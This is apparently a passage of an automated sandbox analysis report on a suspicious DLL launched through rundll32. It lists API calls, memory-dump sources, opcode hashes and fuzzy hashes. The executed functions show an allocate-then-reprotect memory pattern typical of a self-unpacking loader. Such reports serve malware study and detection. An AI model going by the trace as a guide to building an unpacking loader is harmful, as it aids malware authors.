                                                                                                                                                                                                                                                                    • API String ID: 3480331319-2264020820
                                                                                                                                                                                                                                                                    • Opcode ID: 53c551ef0f91e53f92d586c355918dea2692a6dd600710c15c5a8fba4c3db24d
                                                                                                                                                                                                                                                                    • Instruction ID: 0c78d4a9b987671d6dea87edb5512f9bf97fdd85dcde71b351a3198715b3d5a9
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 53c551ef0f91e53f92d586c355918dea2692a6dd600710c15c5a8fba4c3db24d
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AF41E5B491022E9BCF44CFA8C844A9EBBB7BF45318F208556E9189F381D7329A01CF90
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • RtlEncodePointer.NTDLL(00000000), ref: 6E2398AB
                                                                                                                                                                                                                                                                    • CatchIt.LIBVCRUNTIME ref: 6E239991
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.605173313.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CatchEncodePointer
                                                                                                                                                                                                                                                                    • String ID: MOC$RCC
                                                                                                                                                                                                                                                                    • API String ID: 1435073870-2084237596
                                                                                                                                                                                                                                                                    • Opcode ID: a44f195f029b380c9684bd775e41b6d07bd2dfeb0883ed15374457165f229a0e
                                                                                                                                                                                                                                                                    • Instruction ID: cd0c1d6e432eb3fc75652b6c5156116ba26da7a9ad62c8d82514666e3ede15e6
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a44f195f029b380c9684bd775e41b6d07bd2dfeb0883ed15374457165f229a0e
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 514159B190021EAFCF02CFD4CC80AEE7BB6BF49305F244059E91967259DB35A960DF50
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,6E26947C,00000000,?,?,6E23C2C2,?,?,6E23C28A,?,?,?), ref: 6E23C325
                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,6E269494), ref: 6E23C338
                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,6E23C2C2,?,?,6E23C28A,?,?,?), ref: 6E23C35B
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.605173313.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                    • String ID: y#n
                                                                                                                                                                                                                                                                    • API String ID: 4061214504-1692166551
                                                                                                                                                                                                                                                                    • Opcode ID: fa1209aeff62d775ae76282ee327f6e109fea5a59c4830fcbc2cc39d42f3c454
                                                                                                                                                                                                                                                                    • Instruction ID: 7a687c9d759b45a116d3db7e8a1899168a40b42ce57c36f168b3c302217ccc25
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fa1209aeff62d775ae76282ee327f6e109fea5a59c4830fcbc2cc39d42f3c454
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BBF0827150052FFBDF01AB91C94DBDDBB76EB00756F140060E905A5150CB728E50DEA0
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E246DAD
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E246DD6
                                                                                                                                                                                                                                                                    • SetEndOfFile.KERNEL32(00000000,6E244603,00000000,6E23FCD2,?,?,?,?,?,?,?,6E244603,6E23FCD2,00000000), ref: 6E246E08
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,6E244603,6E23FCD2,00000000,?,?,?,?,00000000,?), ref: 6E246E24
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.605173313.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free$ErrorFileLast
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1547350101-0
                                                                                                                                                                                                                                                                    • Opcode ID: 4cf6a4ee52532d02ec7873fc54d2fe10dd95c413885a2e307526fdd450338089
                                                                                                                                                                                                                                                                    • Instruction ID: c735588c6742cc2f8f27a00a8e403b67b311d0d6bd923d6dffa6f3614900a652
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4cf6a4ee52532d02ec7873fc54d2fe10dd95c413885a2e307526fdd450338089
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BF41C2BA920A0EDBDB096FF8CC80FCD37BBAF45365F240914E424A7194EB71C8448E21
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 6E2410C1: _free.LIBCMT ref: 6E2410CF
                                                                                                                                                                                                                                                                      • Part of subcall function 6E241C1A: WideCharToMultiByte.KERNEL32(?,00000000,6E23F667,00000000,00000001,6E23F5F6,6E243EDB,?,6E23F667,?,00000000,?,6E243C4A,0000FDE9,00000000,?), ref: 6E241CBC
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6E240B07
                                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 6E240B0E
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6E240B4D
                                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 6E240B54
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.605173313.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 167067550-0
                                                                                                                                                                                                                                                                    • Opcode ID: 0e8f8ff1ad683a03588f043c0a7ee94e31e75e5ee58ba20ae700419b0ab8e5d3
                                                                                                                                                                                                                                                                    • Instruction ID: 1df7ba487e0dbb17035138ddd7d6e0fc38cdfd839efbd40d635a7ee08f2b41af
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0e8f8ff1ad683a03588f043c0a7ee94e31e75e5ee58ba20ae700419b0ab8e5d3
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D621C47160421EEF9B199FE6CC90C9B77BFEF113687104914E92987140E731EC908FA6
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.605173313.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 1478d614d4fe1469bb8aee1714bd6194960fb516bda7eaddc93b7203bb598ae9
                                                                                                                                                                                                                                                                    • Instruction ID: ee0efca33cca45524b456867e12551e4ec800044271664178559e85a45e6f741
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1478d614d4fe1469bb8aee1714bd6194960fb516bda7eaddc93b7203bb598ae9
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2B212779F0162BEBCB169AE9CC84B5B376B9B03B61F110510ED15A7280E770ED68C9F0
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,6E243991,?,00000001,6E23F667,?,6E243E50,00000001,?,?,?,6E23F5F6,?,?), ref: 6E23D3B1
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E23D40E
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E23D444
                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,6E2700D0,000000FF,?,6E243E50,00000001,?,?,?,6E23F5F6,?,?,?,6E26EBD8,0000002C,6E23F667), ref: 6E23D44F
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.605173313.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLast_free
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2283115069-0
                                                                                                                                                                                                                                                                    • Opcode ID: 5624dc61bfc156235aaabe2c852a64ec71db10d3117b141724cb2a7a7bf4a7ad
                                                                                                                                                                                                                                                                    • Instruction ID: b6521156d952190c61ba2f454fa89e596b8427a820dcfb5bb5a10a338ec00fe7
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5624dc61bfc156235aaabe2c852a64ec71db10d3117b141724cb2a7a7bf4a7ad
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2411EBB620462EABDB5516F6DC84F5A235FA7C2679F350524F624D71C0EFA29C04CD31
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000001,00000001,6E270096,6E23D67C,6E23D707,6E270094,?,6E237E19,6E270096,6E270094,?,?,?,6E234DCE,00000001,6E270098), ref: 6E23D508
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E23D565
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E23D59B
                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,6E2700D0,000000FF,?,6E237E19,6E270096,6E270094,?,?,?,6E234DCE,00000001,6E270098), ref: 6E23D5A6
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.605173313.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLast_free
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2283115069-0
                                                                                                                                                                                                                                                                    • Opcode ID: e5c6f6623fec620917263e49b3893070a8727faa3485e867b711c850677bee4c
                                                                                                                                                                                                                                                                    • Instruction ID: f8298283d072e4fc48fcfb5ec16d1f3ae90cb959e10be8ca6ffc9353df4fb204
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e5c6f6623fec620917263e49b3893070a8727faa3485e867b711c850677bee4c
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2A110AF625062AAFDB5616F6DC84F5A235FA7C267DB300724F528D31C0EBA28808CD30
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,6E23A304,?,?,6E27C7C4,00000000,?,6E23A42F,00000004,6E2693A4,6E26939C,6E2693A4,00000000), ref: 6E23A2D3
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.605173313.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                                                                                                                                    • Opcode ID: 8b91c8622159262a58a474c354ba782cfd22e5975eda48d92c158cbad64805fd
                                                                                                                                                                                                                                                                    • Instruction ID: 4add0e76b800213f7974f452410f2f2f3ea3bbc44c7d122cad41fc2d19ff3337
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8b91c8622159262a58a474c354ba782cfd22e5975eda48d92c158cbad64805fd
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5011A7F1A4593BABDF729AE9CC44B4933A69B06761F210131ED11A7284D6B1E900CEE1
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • WriteConsoleW.KERNEL32(?,?,6E23F667,00000000,?,?,6E246B80,?,00000001,?,00000001,?,6E243920,00000000,?,00000001), ref: 6E247C03
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,6E246B80,?,00000001,?,00000001,?,6E243920,00000000,?,00000001,00000000,00000001,?,6E243E74,6E23F5F6), ref: 6E247C0F
                                                                                                                                                                                                                                                                      • Part of subcall function 6E247BD5: CloseHandle.KERNEL32(6E270910,6E247C1F,?,6E246B80,?,00000001,?,00000001,?,6E243920,00000000,?,00000001,00000000,00000001), ref: 6E247BE5
                                                                                                                                                                                                                                                                    • ___initconout.LIBCMT ref: 6E247C1F
                                                                                                                                                                                                                                                                      • Part of subcall function 6E247B97: CreateFileW.KERNEL32(6E26DD58,40000000,00000003,00000000,00000003,00000000,00000000,6E247BC6,6E246B6D,00000001,?,6E243920,00000000,?,00000001,00000000), ref: 6E247BAA
                                                                                                                                                                                                                                                                    • WriteConsoleW.KERNEL32(?,?,6E23F667,00000000,?,6E246B80,?,00000001,?,00000001,?,6E243920,00000000,?,00000001,00000000), ref: 6E247C34
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.605173313.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2744216297-0
                                                                                                                                                                                                                                                                    • Opcode ID: e5fd61ecb2c54352c8bf2eed2ef41dbc4b347b3992cc299c9179e2be72fe1c13
                                                                                                                                                                                                                                                                    • Instruction ID: c5eb5911c063fb28d765f2d7896f0235507a8151d7e1f3577a679bcd0b015d4b
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e5fd61ecb2c54352c8bf2eed2ef41dbc4b347b3992cc299c9179e2be72fe1c13
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 36F01C3610152DFBDF662FD1CC0CD893F6BFB4A7A1F044410FA29951A0D6728934DBA0
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.605173313.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                    • API String ID: 0-2837366778
                                                                                                                                                                                                                                                                    • Opcode ID: 0e1467c51ca839c1c1521eb53528f2bf45432808041f19ef1d97527362e7fec4
                                                                                                                                                                                                                                                                    • Instruction ID: 1e53db9646c48c4b6a9a7d16aff94c1e03efa8c9ac5e048a2fe0e03364cc73e4
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0e1467c51ca839c1c1521eb53528f2bf45432808041f19ef1d97527362e7fec4
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A6419AF5A4013DAFDB11DBD9CC8599EBBBEEB89B10F304456E5149B200D7708940CF60
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,0000079C,00003000,00000040,0000079C,6E271E18), ref: 6E272480
                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,000000C6,00003000,00000040,6E271E7C), ref: 6E2724B7
                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00013F51,00003000,00000040), ref: 6E272517
                                                                                                                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E27254D
                                                                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(6E1F0000,00000000,00000004,6E2723A2), ref: 6E272652
                                                                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(6E1F0000,00001000,00000004,6E2723A2), ref: 6E272679
                                                                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(00000000,?,00000002,6E2723A2), ref: 6E272746
                                                                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(00000000,?,00000002,6E2723A2,?), ref: 6E27279C
                                                                                                                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E2727B8
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.609378940.000000006E271000.00000040.00020000.sdmp, Offset: 6E271000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Virtual$Protect$Alloc$Free
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2574235972-0
                                                                                                                                                                                                                                                                    • Opcode ID: ff07580d84d1116ad52de69ff726b821f661c6dc75642e126b2e6fdedb51cdd0
                                                                                                                                                                                                                                                                    • Instruction ID: f17b0aec824730e599b8e1a80d803f161a2cfee727357e17c12446058763471d
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ff07580d84d1116ad52de69ff726b821f661c6dc75642e126b2e6fdedb51cdd0
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B7D1AEB66002869FDF11CF54C880F517BA6FF48710B0A45A4EE0AAF75BE771B850DB62
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.609076129.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3136044242-0
                                                                                                                                                                                                                                                                    • Opcode ID: 266bd8c67d8b8a25e08ebad9d8d9fef55d4240af36dd71951b5b26b7bbd76e98
                                                                                                                                                                                                                                                                    • Instruction ID: 4d765f2ace651ee4fdc93cee81dca30f388468670c158b5a3736813278213ce8
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 266bd8c67d8b8a25e08ebad9d8d9fef55d4240af36dd71951b5b26b7bbd76e98
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FC215EF190163EEBDF654A95CC40EAF3B7BDB85B95B214625FC145B690C7308E428FA0
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • __RTC_Initialize.LIBCMT ref: 6E237387
                                                                                                                                                                                                                                                                      • Part of subcall function 6E237BA4: RtlInitializeSListHead.NTDLL(6E27C780), ref: 6E237BA9
                                                                                                                                                                                                                                                                    • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6E2373F1
                                                                                                                                                                                                                                                                    • ___scrt_fastfail.LIBCMT ref: 6E23743B
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.609076129.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Initialize$HeadList___scrt_fastfail___scrt_is_nonwritable_in_current_image
                                                                                                                                                                                                                                                                    • String ID: y#n
                                                                                                                                                                                                                                                                    • API String ID: 2097537958-1692166551
                                                                                                                                                                                                                                                                    • Opcode ID: faf5295c1622196ac71b576df67fcae0100edd1d96b8c6bd83ab9e8e9e1e7280
                                                                                                                                                                                                                                                                    • Instruction ID: 15b2e55c67bfbeb6cadb9e5c293cfe59c448b8e5c825cbb3d2de61b1e9396fe4
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: faf5295c1622196ac71b576df67fcae0100edd1d96b8c6bd83ab9e8e9e1e7280
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F021ACBA50423FDBDF04ABF498197DE7B775B0672AF304859D9456A2C0CF611051CE61
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • VirtualProtectEx.KERNELBASE(000000FF,?,00000040,?), ref: 6E2335B3
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.609076129.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                                                                                                                                    • Opcode ID: 9239825f99d2cbf352a5f025acb91148603ca9e2c73b8d2b5b129fc9dc4f70d4
                                                                                                                                                                                                                                                                    • Instruction ID: 5bde274960abf5af74021a377907620d7e60472df33b0653907b0a4a438c3875
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9239825f99d2cbf352a5f025acb91148603ca9e2c73b8d2b5b129fc9dc4f70d4
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5D71D2719005798FCF14CF6DC498AA97BE7BB46321F24825AE494C7381E2B59A0CDFA0
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 6E2409B9
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.609076129.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                    • Opcode ID: 449622bdf49c6de57c84acab351458f4a78e05e6a085d1b0b271588136038477
                                                                                                                                                                                                                                                                    • Instruction ID: bddc72d36bee3388804d88a0417074f2f184fe88000df087203a3c896b938a24
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 449622bdf49c6de57c84acab351458f4a78e05e6a085d1b0b271588136038477
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 97F02B31A4563FEBFB495AE6CC04F4B375FBF92F70B104011A828A6184EB20D4C086A3
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • ___free_lconv_mon.LIBCMT ref: 6E24297E
                                                                                                                                                                                                                                                                      • Part of subcall function 6E2456B1: _free.LIBCMT ref: 6E2456CE
                                                                                                                                                                                                                                                                      • Part of subcall function 6E2456B1: _free.LIBCMT ref: 6E2456E0
                                                                                                                                                                                                                                                                      • Part of subcall function 6E2456B1: _free.LIBCMT ref: 6E2456F2
                                                                                                                                                                                                                                                                      • Part of subcall function 6E2456B1: _free.LIBCMT ref: 6E245704
                                                                                                                                                                                                                                                                      • Part of subcall function 6E2456B1: _free.LIBCMT ref: 6E245716
                                                                                                                                                                                                                                                                      • Part of subcall function 6E2456B1: _free.LIBCMT ref: 6E245728
                                                                                                                                                                                                                                                                      • Part of subcall function 6E2456B1: _free.LIBCMT ref: 6E24573A
                                                                                                                                                                                                                                                                      • Part of subcall function 6E2456B1: _free.LIBCMT ref: 6E24574C
                                                                                                                                                                                                                                                                      • Part of subcall function 6E2456B1: _free.LIBCMT ref: 6E24575E
                                                                                                                                                                                                                                                                      • Part of subcall function 6E2456B1: _free.LIBCMT ref: 6E245770
                                                                                                                                                                                                                                                                      • Part of subcall function 6E2456B1: _free.LIBCMT ref: 6E245782
                                                                                                                                                                                                                                                                      • Part of subcall function 6E2456B1: _free.LIBCMT ref: 6E245794
                                                                                                                                                                                                                                                                      • Part of subcall function 6E2456B1: _free.LIBCMT ref: 6E2457A6
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E242973
                                                                                                                                                                                                                                                                      • Part of subcall function 6E23D68A: HeapFree.KERNEL32(00000000,00000000,?,6E245842,?,00000000,?,6E270096,?,6E245869,?,00000007,?,?,6E242AD1,?), ref: 6E23D6A0
                                                                                                                                                                                                                                                                      • Part of subcall function 6E23D68A: GetLastError.KERNEL32(?,?,6E245842,?,00000000,?,6E270096,?,6E245869,?,00000007,?,?,6E242AD1,?,?), ref: 6E23D6B2
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E242995
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E2429AA
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E2429B5
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E2429D7
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E2429EA
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E2429F8
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E242A03
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E242A3B
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E242A42
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E242A5F
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E242A77
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.609076129.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 161543041-0
                                                                                                                                                                                                                                                                    • Opcode ID: a44816209776e4e40cd017dc98265cd90fc3f4c90bc5874762c8ced33a29f924
                                                                                                                                                                                                                                                                    • Instruction ID: a63bd5db076cb06e5093edef45ccf21baba3bcc49aedbfc37e97efda839b46bd
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a44816209776e4e40cd017dc98265cd90fc3f4c90bc5874762c8ced33a29f924
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4E3190B260031ADFEB648BB6DC40B8673EABF00355F314D19E869D7154DB31E8408F14
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • IsInExceptionSpec.LIBVCRUNTIME ref: 6E2395CB
                                                                                                                                                                                                                                                                    • type_info::operator==.LIBVCRUNTIME ref: 6E2395F2
                                                                                                                                                                                                                                                                    • ___TypeMatch.LIBVCRUNTIME ref: 6E2396FE
                                                                                                                                                                                                                                                                    • CatchIt.LIBVCRUNTIME ref: 6E239753
                                                                                                                                                                                                                                                                    • IsInExceptionSpec.LIBVCRUNTIME ref: 6E2397D9
                                                                                                                                                                                                                                                                    • _UnwindNestedFrames.LIBCMT ref: 6E239860
                                                                                                                                                                                                                                                                    • CallUnexpected.LIBVCRUNTIME ref: 6E23987B
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.609076129.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                                                                                                                    • String ID: csm$csm$csm
                                                                                                                                                                                                                                                                    • API String ID: 4234981820-393685449
